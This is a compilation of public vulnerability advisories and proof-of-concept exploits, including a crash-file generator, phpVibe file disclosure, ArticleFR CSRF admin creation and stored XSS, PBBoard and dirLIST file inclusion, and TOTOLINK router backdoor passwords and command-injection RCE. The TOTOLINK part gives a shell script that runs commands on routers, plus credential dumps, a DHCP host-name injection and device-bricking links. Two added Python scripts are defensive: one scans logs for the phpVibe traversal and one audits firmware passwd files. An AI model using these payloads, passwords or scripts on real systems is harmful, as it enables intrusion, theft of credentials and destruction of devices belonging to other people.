x87\xAB\xAF\x6E\x5A\xF5\x44\x53\x71\xF5\xF4\x94\xEF\xE6\xF9\x0F\x31\xE7\x7D\xE3\x55\xAA\xF1\xD8\x84\x76\x35\x67\x32\x6E\x4F\x96\x93\xA5\xCE\x8C\x47\x91\x14\x9F\x35\x7D\x0C\xEF\xC7\xD6\x90\xEC\x7A\xBD\x7B\x8C\x72\x98\xEE\xBB\x78\x3D\x4E\xD7\xCC\x54\xDD\xC5\x5E\x46\x9E\x8A\xFA\x2D\xB9\xE8\xE9\x5D\x95\xBD\x4D\xA8\x9D\x73\x66\x21\x2B\xD7\x76\xC2\x74\xB5\xF7\xDC\xBD\x9F\x29\x8E\x71\x63\xFF\x5B\x12\x9B\x76\x3D\x61\xF8\xB6\xBC\x35\x71\x34\x33\xBF\xFF\x35\x7F\xFE\x2C\x05\xB6\x04\x18\x02\xFF\x0B\xDF\xC2\xE0\x47\x96\x83\x50\x8A\x58\xC2\xD0\x37\xD3\x10\xC3\x14\x51\x15\x45\x01\x1E\x7C\xA5\xAE\x06\xF3\x9F\x05\xC2\x40\xAA\xFD\x6F\x56\x9A\x18\x93\xFD\x
E7\x4C\x62\xD8\x48\xD6\xB7\xDA\xF4\x2C\xAC\x63\x8F\x4E\x37\x38\x3B\x55\x30\xDA\x9C\x35\x5A\x6E\x15\x23\xC7\xCE\x00\x00\x00\x00\x00\xE9\x98\x31\x45\xEF\x87\xEF\x67\xE5\xD9\x7A\x7B\xE5\x60\xBD\xB2\x79\x98\xCC\xE2\xEC\xEA\x6B\x97\xD9\xC5\xEA\x14\x2B\x4D\x87\x31\x7E\x30\x7B\xBC\xC7\xC5\xC2\x7E\x5A\x31\x7F\xFD\xB7\xE9\xD1\xA7\x2F\x35\x3C\x2E\xE8\x28\xA3\xAF\x33\x1F\x31\xDE\x38\x13\x3B\x7F\x82\xBE\x23\x9D\x3C\xBF\x08\x3A\xBF\x1E\x26\xA9\xDD\x7B\xD4\x0D\x3F\x1C\x3A\xEB\x86\xCA\xF2\x4D\x48\x71\xE7\xD2\xFE\x1F\x7B\xAC\x25\x55\x22\x97\xC6\xBF\xFB\xA1\x2B\x67\xE3\xEF\xCC\xAC\x2F\xBB\x2A\x35\xEA\xC2\xF8\xE5\xE9\xDE\x69\x7E\x9D\x70\xA2\xA2\x71\x57\xC2\x6C\xC2\xDF\xE2\xEB\x39\xC9\x87\xEC\xD2\x5E\x45\x1D\x53\x5F\xEE\xBF\x3C\x66\x1B\x83\xB5\x5D\x43\x41\xA9\xD9\xFB\x22\x7F\xBD\x70\x73\x25\xF4\xFA\xFE\xCA\xE8\x88\xED\x73\x2E\xB9\x9C\x64\xA7\xB3\x61\x89\x7B\xDF\x11\x44\x52\xDF\x7A\xDC\x92\xEC\x7C\xA2\x2B\x8F\x92\x5C\x9B\xCE\x21\x1F\xC8\xCC\x15\xEF\x53\xB0\x5B\xE5\x51\x5F\x18\x72\x0F\x89\x7F\x69\x59\x10\x58\x36\xF8\x58\x15\x11\x6D\x96\x8E\xDB\xEF\xCD\x38\xC6\xA7\xEF\xE7\xFE\x68\x61\x61\x26\x5E\x15\x11\x95\xC7\xA6\x29\x02\xA6\x8A\x20\x2A\xC6\x91\x88\xBE\x6D\x99\x68\xF8\x2F\xB0\x1C\x38\xB0\x6C\x09\x05\x00\xBE\xAB\x85\x2E\x47\xC8\xFF\x0C\x22\xED\x55\x91\x28\xF2\xAD\x16\x53\x17\xF8\xCF\x19\x30\x90\x78\xAB\x93\x33\x37\xFD\xFB\xB9\xDF\x25\x5C\x5A\x01\xDB\x9C\xFB\x29\xA0\xDC\x67\xAB\x24\x13\xD2\x77\x06\x00\x00\x00\x00\xD8\xC9\x3C\x93\x47\x63\xF7\x34\xFE\xCF\xCC\x36\xDE\xF0\x6B\xEF\xE1\x64\xC2\x28\x91\xE3\xC1\x69\x0E\xC5\x2B\x2D\x39\xB7\xAD\xEB\x6E\xB6\x66\x64\xD7\x2F\x96\xA7\xCB\x3A\xFD\xB5\xF3\xFD\xD5\x43\xF5\xB0\x8D\xBD\xA9\xFE\x31\xA3\xFB\xAF\x0E\xB4\x8A\x60\xC6\x5C\x1A\x5D\xC7\xC1\xDC\x72\x65\x22\x0B\x7C\xC4\xDE\x77\x96\x9F\xAD\xC9\xD3\x33\xDB\xF9\x1F\x3D\x8F\x9C\x49\xA7\xE7\xF5\xBB\x15\xCF\xBB\x93\xF3\x2C\x6D\xF3\x6F\x8C\x35\x97\xFC\x85\xFB\xCE\x1C\xAE\xE1\x92\xD4\xE3\xF1\x3B\x6C\xAC\xD9\xB3\xC2\xDD\xDD\x25\x4E\x37\x8B\xC4\x38\x86\xFB\xBE\xEF\x6B\xEB\x83\x59\xEF\xF9\x15\xE8\x61\xAA\x9A\x
66\xB7\x5E\xB6\x2A\xC9\x5E\xFC\x29\x31\x4D\x49\x6F\x9F\x48\xA8\x74\x1D\xE5\xE4\xEB\x3F\x97\x23\xB8\x17\x6C\x7E\xCA\x3F\x5C\xAA\xA4\xA7\x3C\x96\xBD\xF8\xFE\x74\x7F\xF0\xB7\xA9\x3D\x6D\x4D\xEF\x7D\xFF\x5C\x75\x8C\x2E\x7B\x36\x61\xB5\x30\x50\x11\xF0\xCB\x14\x64\x2D\x59\x3D\x9C\xA1\x7E\xEE\x1E\xCF\x90\x39\x4F\x6B\xD3\x1A\x26\x2B\xAC\xF6\x16\x2A\x26\x7A\xF3\xB6\xF5\xCD\x4B\xB0\x6F\x4E\x4B\x56\xEC\x3F\x72\x88\x25\x00\x59\x92\xC1\x96\xF4\x81\xE5\x2D\xD3\xDB\x67\x4B\x72\x53\x55\xCC\xDF\x31\xC4\xB0\xD7\x7B\x72\x33\xD4\x5F\xE4\xF0\xAF\xCF\x0E\x6D\x49\x78\x00\xBE\xAB\x85\x22\x46\xFD\xBF\x41\xC6\x56\x99\x53\xED\x67\xB5\x24\x4C\x71\xFD\x6F\x00\x03\xA9\xFE\x97\xC1\xB0\x76\x02\xA3\x8E\xD4\x29\xA0\xDA\x53\xAD\x72\x34\x7C\x30\x00\x8C\x30\x00\x00\x20\x72\x31\x5C\xFB\x63\x1B\xE5\xA9\x53\xFB\x75\x73\x54\x97\xDD\x6D\xB7\x36\x39\x36\xF5\x0B\xF1\xAE\x04\x0A\xDE\xF4\x91\x78\xC9\x51\xAF\xF1\x13\x6B\xF2\x95\x0F\xDB\x7B\x9F\x8C\xFD\xDF\x79\xF9\xE7\x0F\x07\xD9\x94\xCD\xEB\x94\xBA\xFD\xC7\xE4\xBA\xF6\xE7\xC1\x3C\x72\xAF\x8F\x8B\x33\x1E\x74\x72\x8B\x6C\xC5\x0F\x5D\xED\x93\x12\x1A\xFE\x77\xFF\xFB\xEA\xE4\xFD\x6D\x57\x33\xA6\x39\xD4\xA7\xC1\x65\x65\x73\xE5\x7F\x89\xCD\x66\x53\x03\xFB\x67\x15\x73\x95\x48\xF7\xA6\xE7\x79\x3A\xDD\x1C\x2D\xC7\xCF\x3C\xCE\xF1\xCC\xCC\xA9\xC7\xB9\x23\x1D\x39\x7C\x43\x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\xCA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\x
BC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x50\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D") filename = "crash.ogg" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" file.close()

phpVibe - Arbitrary File Disclosure

## In The Name Of ALLAH ##
# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1

stream.php
====================================
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));

The file parameter has no validation and sanitization!

Exploitation can be performed by adding "@@media" to the file name and base64-encoding it twice, as below (no registration needed):

http://domain.tld/stream.php?file=../vibe_config.php@@media
==>
http://domain.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09
=====================================
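As an added example (not phpVibe's own code), the following Python undoes the double base64 encoding of the `file` parameter and flags stream.php requests whose decoded name leaves the media directory. The access-log lines are constructed, and treating the text before `@@` as the looked-up file name is an assumption drawn from the PoC.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, quote, urlparse

# Added example, not phpVibe's code: reverse the double base64 encoding that
# stream.php applies to its "file" parameter and flag values that reach outside
# the media directory, then run the check over constructed access-log lines.

# a ".." path component with either separator, anywhere in the name
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# common-log-format request line: client, then the request target
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def decode_file_param(value: str) -> Optional[str]:
    """Return the twice-decoded 'file' value, or None when it is not valid base64."""
    try:
        once = base64.b64decode(value, validate=True)
        twice = base64.b64decode(once, validate=True)
    except (binascii.Error, ValueError):
        return None
    return twice.decode("utf-8", errors="replace")


def is_suspicious(decoded: str) -> bool:
    """True when the decoded name is not a plain relative path inside the media tree."""
    # assumption from the PoC: the part before '@@' is the file actually looked up
    name = decoded.split("@@", 1)[0]
    return (
        name.startswith(("/", "\\"))           # absolute path
        or "\x00" in name                      # NUL truncation
        or TRAVERSAL.search(name) is not None  # ../ traversal
    )


def scan_log(lines: List[str]) -> List[Tuple[str, Optional[str]]]:
    """(client, decoded_file) for every stream.php request with a malformed or suspicious 'file'."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlparse(target)
        if not url.path.endswith("/stream.php"):
            continue
        for raw in parse_qs(url.query).get("file", []):
            decoded = decode_file_param(raw)
            if decoded is None or is_suspicious(decoded):
                hits.append((client, decoded))
    return hits


def double_encode(name: str) -> str:
    """Encode a name the way the PoC does: base64 applied twice."""
    return base64.b64encode(base64.b64encode(name.encode())).decode()


# Constructed sample log lines: the advisory's PoC value, a legitimate request,
# and an unrelated request.
POC_VALUE = "TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09"
LOG_LINES = [
    f'10.0.0.5 - - [13/Jul/2015:10:00:01 +0000] "GET /stream.php?file={POC_VALUE} HTTP/1.1" 200 1422',
    f'10.0.0.6 - - [13/Jul/2015:10:00:02 +0000] "GET /stream.php?file='
    f'{quote(double_encode("videos/clip.mp4"), safe="")} HTTP/1.1" 200 90210',
    '10.0.0.7 - - [13/Jul/2015:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, decoded in scan_log(LOG_LINES):
        print(f"{client}: suspicious stream.php file parameter -> {decoded!r}")
```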

ArticleFR 3.0.6 - Multiple Vulnerabilities

ArticleFR 3.0.6 CSRF Add Admin Exploit

Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video) management system. Comes with a pluggable and multiple module framework system.

Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: nginx/1.6.2
           PHP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5248
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php

21.06.2015

--

<html>
  <body>
    <form action="http://127.0.0.1/dashboard/users/create/" method="POST">
      <input type="hidden" name="username" value="thricer" />
      <input type="hidden" name="name" value="The_Hacker" />
      <input type="hidden" name="password" value="s3cr3t" />
      <input type="hidden" name="email" value="lab@zeroscience.mk" />
      <input type="hidden" name="website" value="http://www.zeroscience.mk" />
      <input type="hidden" name="blog" value="zsl" />
      <input type="hidden" name="membership" value="admin" />
      <input type="hidden" name="isactive" value="active" />
      <input type="hidden" name="submit" value="Create" />
      <input type="submit" value="Request" />
    </form>
  </body>
</html>

##################################################################

ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities

Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video) management system. Comes with a pluggable and multiple module framework system.

Desc: ArticleFR suffers from multiple stored cross-site scripting vulnerabilities. The issues are triggered when input passed via the POST parameter 'name' in Categories, the POST parameters 'title' and 'rel' in Links, and the GET parameter 'url' in the PingServers module is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Tested on: nginx/1.6.2
           PHP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5247
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php

21.06.2015

--

POST 'name' Categories Stored XSS:
----------------------------------

<html>
  <body>
    <form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
      <input type="hidden" name="name" value='"><script>alert(1)</script>' />
      <input type="hidden" name="parent" value="0" />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #1" />
    </form>
  </body>
</html>

POST 'title', 'rel' Links Stored XSS:
------------------------------------

<html>
  <body>
    <form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
      <input type="hidden" name="title" value='"><script>alert(2)</script>' />
      <input type="hidden" name="url" value="http://www.zeroscience.mk" />
      <input type="hidden" name="rel" value='"><script>alert(3)</script>' />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #2 and #3" />
    </form>
  </body>
</html>

POST 'url' Ping Server Reflected XSS:
-------------------------------------

<html>
  <body>
    <form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
      <input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #4" />
    </form>
  </body>
</html>

PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution

source: https://www.securityfocus.com/bid/54916/info

PBBoard is prone to multiple security vulnerabilities including:

1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability

Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.

PBBoard 2.1.4 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">
  <input type="hidden" name="context" value='<? phpinfo(); ?>'>
  <input type="submit" name="Submit" value="Send">
</form>

dirLIST 0.3.0 - Local File Inclusion

source: https://www.securityfocus.com/bid/54933/info

dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini

http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini
# WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
# Vendor Homepage: http://www.wpdownloadmanager.com
# Software Link: https://wordpress.org/plugins/download-manager
# Affected Versions: Free 2.7.94 & Pro 4
# Tested on: WordPress 4.2.2
# Discovered by Filippos Mastrogiannis
# Twitter: @filipposmastro
# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177

-- Description --

The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file:

Example: <svg onload=alert(0)>.jpg

The vulnerability exists because the file name is not properly sanitized, which allows malicious code to be injected and executed in the target's browser.

-- Proof of Concept --

1. The attacker creates a new download package via the plugin's menu and uploads a file with the name: <svg onload=alert(0)>.jpg
2. The stored XSS is triggered when an authenticated user (e.g. admin) attempts to edit this download package

-- Solution --

Upgrade to the latest version

4 TOTOLINK Router Models - Backdoor Credentials

## Advisory Information

Title: Backdoor credentials found in 4 TOTOLINK router models
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-credentials-found-in-4-TOTOLINK-products.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE

## Product Description

TOTOLINK is a brother brand of ipTime, which holds over 80% of the SOHO market in South Korea. TOTOLINK produces routers, wifi access points and network devices. Their products are sold worldwide.

## Vulnerabilities Summary

Backdoor credentials are present in several TOTOLINK products. This affects 4 TOTOLINK products (firmwares come from totolink.net and from totolink.cn):

G150R-V1 : last firmware 1.0.0-B20150330 (TOTOLINK-G150R-V1.0.0-B20150330.1734.web)
G300R-V1 : last firmware 1.0.0-B20150330 (TOTOLINK-G300R-V1.0.0-B20150330.1816.web)
N150RH-V1 : last firmware 1.0.0-B20131219 (TOTOLINK-N150RH-V1.0.0-B20131219.1014.web)
N301RT-V1 : last firmware 1.0.0 (TOTOLINK N301RT_V1.0.0.web)

It allows an attacker on the LAN to connect to the device using telnet with 2 different accounts, root and 'onlime_r', both of which have root privileges.

## Details - G150R-V1 and G300R-V1

The init.d script executes these commands when the router starts:

[...]
cp /etc/passwd_orig /var/passwd
cp /etc/group_orig /var/group
telnetd&
[...]

The /etc/passwd_orig contains backdoor credentials:

root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

The corresponding passwords are:

root:12345
onlime_r:12345

## Details - N150RH-V1 and N301RT

The init.d script executes these commands when the router starts:

[...]
#start telnetd
telnetd&
[...]

The binary /bin/sysconf executes these commands when the router starts:

system("cp /etc/passwd.org /var/passwd 2> /dev/null")

The /etc/passwd.org contains backdoor credentials:

root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

The corresponding passwords are:

root:12345
onlime_r:12345

## Vendor Response

TOTOLINK was not contacted regarding this case.

## Report Timeline

* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
* Jun 26, 2015: working PoCs.
* Jul 16, 2015: A public advisory is sent to security mailing lists.

## Credit

These backdoor credentials were found by Pierre Kim (@PierreKimSec).

## References

https://pierrekim.github.io/advisories/2015-totolink-0x03.txt

## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
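As an added example, not part of the advisory, the following Python audits a passwd file pulled out of a firmware image for the pattern shown above: a second uid-0 login sharing root's password hash, with the hashes sitting in world-readable passwd rather than shadow. The first three entries are the advisory's; the `www` entry is constructed as a benign control.

```python
from collections import defaultdict
from typing import List

# Added example, not the advisory's code: audit a firmware passwd file for
# extra uid-0 logins, shared password hashes and hashes exposed in passwd.
# The first three lines come from the advisory; 'www' is a constructed entry.
PASSWD_ORIG = """\
root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null
www:x:33:33:www:/var/www:/bin/false
"""

LOCKED = {"x", "*", "!", "!!"}  # placeholders meaning "no usable hash here"


def parse_passwd(text: str) -> List[dict]:
    """Split passwd(5) lines into their seven fields; a malformed line raises."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "hash": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one human-readable finding per suspicious property."""
    findings = []
    by_hash = defaultdict(list)
    for e in parse_passwd(text):
        if e["hash"] == "":
            findings.append(f"{e['name']}: empty password")
        elif e["hash"] not in LOCKED:
            # a real hash in passwd (not shadow) is readable by every local user
            findings.append(f"{e['name']}: password hash stored in passwd (no shadow)")
            by_hash[e["hash"]].append(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: uid 0 login besides root (shell {e['shell']})")
    for names in by_hash.values():
        if len(names) > 1:
            # identical salt and digest means identical password
            findings.append("same password hash shared by: " + ", ".join(names))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_ORIG):
        print(finding)
```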
## Advisory Information Title: 15 TOTOLINK router models vulnerable to multiple RCEs Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html Date published: 2015-07-16 Vendors contacted: None Release mode: 0days, Released CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerabilities Summary The first vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single HTTP request. The second vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single DHCP request. There are direct RCEs against the routers which give a complete root access to the embedded Linux from the LAN side. 
The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin) - TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin) - TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net) - TOTOLINK EX300 : until last firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn) - TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0) - TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin) - TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin) - TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin) - TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin) - TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin) - TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin) - TOTOLINK A3004NS (no firmware available in totolinkusa.com but ipTIME's A3004NS model was vulnerable to the 2 RCEs) - TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0) The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin) - TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin) Firmwares come from totolink.net and from totolink.cn. - - From my tests, it is possible to use these vulnerabilities to overwrite the firmware with a custom (backdoored) firmware. Concerning the high CVSS score (10/10) of the vulnerabilities and the longevity of this vulnerability (6+ year old), the TOTOLINK users are urged to contact TOTOLINK. ## Details - RCE with a single HTTP request The HTTP server allows the attacker to execute some CGI files. 
Many of them are vulnerable to a command inclusion which allows to execute commands with the http daemon user rights (root). Exploit code: $ cat totolink.carnage #!/bin/sh if [ ! $1 ]; then echo "Usage:" echo $0 ip command exit 1 fi wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh The exploits have been written in HTML/JavaScript, in form of CSRF attacks, allowing people to test their systems in live using their browsers: http://pierrekim.github.io/advisories/ o Listing of the filesystem HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html Using CLI: root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head ash auth busybox cat chmod cp d.cgi date echo false root@kali:~/totolink# o How to retrieve the credentials ? (see login and password at the end of the text file) HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg wantype.wan1=dynamic dhblock.eth1=0 ppp_mtu=1454 fakedns=0 upnp=1 ppp_mtu=1454 timeserver=time.windows.com,gmt22,1,480,0 wan_ifname=eth1 auto_dns=1 dhcp_auto_detect=0 wireless_ifmode+wlan0=wlan0,0 dhcpd=0 lan_ip=192.168.1.1 lan_netmask=255.255.255.0 dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0 dhcpd_dns=164.124.101.2,168.126.63.2 dhcpd_opt=7200,30,200, dhcpd_configfile=/etc/udhcpd.conf dhcpd_lease_file=/etc/udhcpd.leases dhcpd_static_lease_file=/etc/udhcpd.static use_local_gateway=1 login=admin password=admin Login and password are stored in plaintext, which is a very bad security practice. 
  o Current running process:

    HTML/JS exploit:
    http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html

    Using the CLI:
    kali# ./totolink.carnage 192.168.1.1 ps -auxww

  o Getting the kernel memory:

    HTML/JS exploit:
    http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html

    Using the CLI:
    kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore

  o Default firewall rules:

    HTML/JS exploit:
    http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html

    Using the CLI:
    kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL

  o Opening the management interface on the WAN:

    HTML/JS exploit:
    http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html

  o Reboot the device:

    HTML/JS exploit:
    http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html

  o Brick the device:

    HTML/JS exploit:
    http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html

An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root.

By the way, d.cgi in /bin/ is an intentional backdoor.

## Details - RCE with a single DHCP request

This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in TOTOLINK devices allows remote attackers to execute arbitrary commands via shell metacharacters in the host-name field.

Sending a DHCP request with this parameter will reboot the device:

```
cat /etc/dhcp/dhclient.conf
send host-name ";/sbin/reboot";
```

When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we will see the stdout of the /dev/console device; the DHCP request will immediately force the reboot of the remote device:

```
Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                                                                              @
@  chip__no  chip__id  mfr___id  dev___id  cap___id  size_sft  dev_size  chipSize
@  0000000h  0c84015h  00000c8h  0000040h  0000015h  0000000h  0000015h  0200000h
@  blk_size  blk__cnt  sec_size  sec__cnt  pageSize  page_cnt  chip_clk  chipName
@  0010000h  0000020h  0001000h  0000200h  0000100h  0000010h  000004eh  GD25Q16
@                                                                              @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

[...]

WiFi Simple Config v1.12 (2009.07.31-11:35+0000).
Launch iwcontrol: wlan0
Reaped 317
iwcontrol RUN OK
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
WAN0 IP: 192.168.2.1
signalling START
Invalid upnpd exit
killall: upnpd: no process killed
upnpd Restart 1
iptables: Bad rule (does a matching rule exist in that chain?)
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 ) Update Session timestamp and try it after 5 seconds again.
ez_ipupdate callback --> time_elapsed: 0
Run DDNS by IP change: / 192.168.2.1
Reaped 352
iptables: Bad rule (does a matching rule exist in that chain?)
Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file
Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
